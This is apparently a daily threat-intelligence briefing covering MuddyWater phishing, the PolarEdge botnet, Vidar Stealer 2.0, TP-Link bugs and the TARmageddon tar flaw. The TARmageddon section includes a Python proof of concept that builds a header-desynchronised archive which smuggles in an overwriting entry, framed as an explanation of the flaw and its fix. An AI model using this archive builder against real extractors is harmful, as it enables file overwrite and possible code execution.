Daily Threat Briefing
Diamond Trail

Cyware Daily Threat Intelligence, October 22, 2025


A phishing campaign by the Iran-linked group MuddyWater has targeted over 100 government entities across the Middle East and North Africa. The attackers used a compromised email account to distribute Word documents that deployed the Phoenix backdoor once recipients enabled macros, giving the group persistent access to victim systems.

A new and improved version of the Vidar Stealer malware has been released, now completely rewritten in C for better performance and evasion. Dubbed Vidar Stealer 2.0, this potent malware specializes in stealing sensitive data from infected machines. It then sends the stolen information to the attackers via platforms like Telegram.

A high-severity vulnerability named TARmageddon has been discovered in the async-tar Rust library and its forks. The flaw lets an attacker overwrite files on a target system during the extraction of a malicious TAR archive; depending on which files are overwritten, this can escalate to remote code execution.

Top Malware Reported in the Last 24 Hours

MuddyWater's sophisticated phishing campaign

Group-IB revealed a phishing campaign orchestrated by the Iran-linked APT group MuddyWater, targeting over 100 governmental entities in the Middle East and North Africa. The attackers logged into a compromised email account through NordVPN and sent phishing emails carrying Microsoft Word attachments that prompted recipients to enable macros. Once macros were enabled, malicious VBA code deployed the Phoenix backdoor v4, which gave the attackers persistent access. The operation also used the FakeUpdate injector and a custom credential-stealing tool disguised as a calculator application.

PolarEdge botnet targets popular routers

PolarEdge is a botnet malware that targets routers and NAS devices from Cisco, ASUS, QNAP, and Synology. It exploits known vulnerabilities, including CVE-2023-20118 in Cisco Small Business RV-series routers, to install a backdoor that communicates with its command-and-control server over TLS. The backdoor can execute commands and update its configuration in real time, and it employs several anti-analysis techniques to avoid detection. PolarEdge operates in two modes: a connect-back mode used for file downloads and a debug mode for interactive adjustments. It also disguises its process names to evade security tooling.

Meet Vidar Stealer 2.0

Vidar Stealer 2.0 has emerged with significant upgrades, including a complete rewrite in C and multi-threaded data theft, improving performance and reducing its detection footprint. The malware targets sensitive information from a range of applications, including browser cookies, cryptocurrency wallets, and cloud credentials. Notably, it bypasses Chrome's App-Bound Encryption by injecting into running browser processes and executing code directly inside them rather than attacking the encrypted store from outside. After collection, Vidar 2.0 captures screenshots and transmits the stolen data to designated delivery points, such as Telegram bots and URLs hosted on Steam profiles.

Top Vulnerabilities Reported in the Last 24 Hours

TP-Link patches multiple bugs

TP-Link has released security updates addressing four vulnerabilities in its Omada gateway devices, two of which are critical and allow remote code execution. These two, CVE-2025-6541 and CVE-2025-6542, can be exploited to execute arbitrary commands on the devices. The remaining issues are CVE-2025-7850, which requires administrator access to exploit, and CVE-2025-7851, an improper privilege management flaw. Affected models include ER8411, ER7412-M2, ER707-M2, and several others; the fixed firmware version for each model is listed in TP-Link's advisory.

TARmageddon flaw exposes async-tar vulnerability

A high-severity vulnerability, named "TARmageddon," has been discovered in the async-tar Rust library and its forks, including tokio-tar, potentially allowing remote code execution through file overwriting attacks. The flaw, tracked as CVE-2025-62518 with a CVSS score of 8.1, results from inconsistent handling of PAX extended headers and ustar headers within TAR files: the parser uses one header's size to read an entry's data but the other to decide where the next header begins. An attacker can exploit this inconsistency to smuggle additional archive entries inside the body of a legitimate-looking entry, and those hidden entries can overwrite files during extraction. The tokio-tar library is essentially abandoned and has not been updated since July 2023, so users relying on it or on other unmaintained forks will not receive a fix and should migrate to a maintained fork.
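The following is an added example, written for this briefing in Python and not code from async-tar, tokio-tar, or the researchers who disclosed TARmageddon. It models the header desynchronisation described above: it builds a TAR archive in memory whose PAX extended header declares one size for an entry while the ustar header declares zero bytes, then walks the archive two ways. The correct walk uses the PAX size both to read the entry and to advance to the next header; the vulnerable walk reads with the PAX size but advances by the ustar size, so the entry's own bytes are re-parsed as a smuggled second entry that overwrites an earlier file. All file names and contents (`config.json`, `notes.bin`, the JSON payloads) are constructed for the demonstration.

```python
"""Model of the TARmageddon (CVE-2025-62518) PAX/ustar size desynchronisation.

Added example for this briefing; not the async-tar or tokio-tar source.
File names and contents below are constructed, not taken from any real sample.
"""

BLOCK = 512


def pad(data: bytes) -> bytes:
    """Zero-pad data to a multiple of the 512-byte TAR block size."""
    return data + b"\0" * (-len(data) % BLOCK)


def padded_len(n: int) -> int:
    """Number of bytes n data bytes occupy once block-padded."""
    return -(-n // BLOCK) * BLOCK


def ustar_header(name: str, size: int, typeflag: bytes = b"0") -> bytes:
    """Build a minimal POSIX ustar header with a valid checksum."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name.encode()
    hdr[100:108] = b"0000644\0"          # mode
    hdr[108:116] = b"0000000\0"          # uid
    hdr[116:124] = b"0000000\0"          # gid
    hdr[124:136] = b"%011o\0" % size     # size, octal ASCII
    hdr[136:148] = b"00000000000\0"      # mtime
    hdr[148:156] = b"        "           # checksum field counts as spaces
    hdr[156:157] = typeflag              # b"0" regular file, b"x" PAX header
    hdr[257:263] = b"ustar\0"
    hdr[263:265] = b"00"
    hdr[148:156] = b"%06o\0 " % sum(hdr)
    return bytes(hdr)


def checksum_ok(hdr: bytes) -> bool:
    stored = int(hdr[148:156].split(b"\0", 1)[0].strip(), 8)
    return stored == sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:])


def pax_record(key: str, value: str) -> bytes:
    """One PAX record, '<len> key=value\\n', where <len> counts itself."""
    body = f" {key}={value}\n"
    n = len(body) + 1
    while len(str(n)) + len(body) != n:
        n = len(str(n)) + len(body)
    return f"{n}{body}".encode()


def parse_pax(body: bytes) -> dict:
    recs, i = {}, 0
    while i < len(body):
        sp = body.index(b" ", i)
        n = int(body[i:sp])
        key, _, val = body[sp + 1:i + n - 1].partition(b"=")
        recs[key.decode()] = val.decode()
        i += n
    return recs


def octal_field(raw: bytes) -> int:
    text = raw.split(b"\0", 1)[0].strip()
    return int(text, 8) if text else 0


def parse_entries(archive: bytes, vulnerable: bool = False) -> list:
    """Return (name, data) tuples for every entry the walker sees.

    vulnerable=False: the PAX 'size' override governs both how many data bytes
    belong to the entry and how far to advance to the next header.
    vulnerable=True:  data is read with the PAX size but the stream advances by
    the ustar size, so bytes inside the entry get parsed as further headers.
    """
    entries, pos, pax = [], 0, {}
    while pos + BLOCK <= len(archive):
        hdr = archive[pos:pos + BLOCK]
        if hdr == bytes(BLOCK):          # end-of-archive zero block
            break
        if not checksum_ok(hdr):
            raise ValueError(f"bad header checksum at offset {pos}")
        name = hdr[:100].split(b"\0", 1)[0].decode()
        ustar_size = octal_field(hdr[124:136])
        typeflag = hdr[156:157]
        pos += BLOCK
        if typeflag == b"x":             # PAX extended header for the next entry
            pax = parse_pax(archive[pos:pos + ustar_size])
            pos += padded_len(ustar_size)
            continue
        size = int(pax.get("size", ustar_size))
        entries.append((name, archive[pos:pos + size]))
        pos += padded_len(ustar_size if vulnerable else size)
        pax = {}
    return entries


def extract_to_dict(entries: list) -> dict:
    """Stand-in for extraction: a later entry with the same name overwrites an earlier one."""
    out = {}
    for name, data in entries:
        out[name] = data
    return out


LEGIT = b'{"debug": false}\n'                              # constructed
SMUGGLED = b'{"debug": true, "allow_remote": true}\n'      # constructed


def build_smuggling_archive() -> bytes:
    # A complete tar entry for config.json hidden inside notes.bin's data.
    hidden_entry = ustar_header("config.json", len(SMUGGLED)) + pad(SMUGGLED)
    # The PAX header tells the truth about notes.bin's length ...
    pax = pax_record("size", str(len(hidden_entry)))
    return (
        ustar_header("config.json", len(LEGIT)) + pad(LEGIT)
        + ustar_header("PaxHeaders/notes.bin", len(pax), b"x") + pad(pax)
        # ... while its ustar header claims the entry is empty.
        + ustar_header("notes.bin", 0) + pad(hidden_entry)
        + bytes(2 * BLOCK)
    )


if __name__ == "__main__":
    archive = build_smuggling_archive()
    for mode in (False, True):
        entries = parse_entries(archive, vulnerable=mode)
        names = [n for n, _ in entries]
        print("vulnerable" if mode else "correct", names,
              extract_to_dict(entries)["config.json"])
```

The correct walk yields `config.json` and `notes.bin`, with `config.json` keeping its legitimate content; the vulnerable walk yields a third entry, a second `config.json` carved out of `notes.bin`'s body, which overwrites the first on extraction. The fix is the `vulnerable=False` branch: whatever size the parser uses to read an entry's data must also be the size it advances by. Running both walks over an untrusted archive and comparing the entry lists is a cheap way to flag archives built to exploit this class of desynchronisation.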

Tags: MuddyWater, PolarEdge botnet, Vidar Stealer 2.0, TARmageddon flaw
